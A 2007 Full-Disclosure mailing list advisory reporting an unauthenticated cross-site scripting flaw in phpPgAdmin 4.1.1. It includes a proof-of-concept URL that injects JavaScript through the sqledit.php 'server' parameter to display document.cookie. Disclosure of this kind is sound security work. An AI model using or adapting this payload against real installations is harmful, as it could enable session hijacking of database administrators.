[Full-disclosure] phpPgAdmin XSS Vulnerability
Michal Majchrowicz
m.majchrowicz at gmail.com
Wed May 23 00:28:59 BST 2007
There is a JavaScript code Injection in phpPgAdmin which fails to correctly
sanitize user supplied data. As a result very simple XSS is possible. This
was tested on phpPgAdmin 4.1.1 as not logged user.
PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//
Regards Michal Majchrowicz.
Hack.pl
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070523/8f75ef6d/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.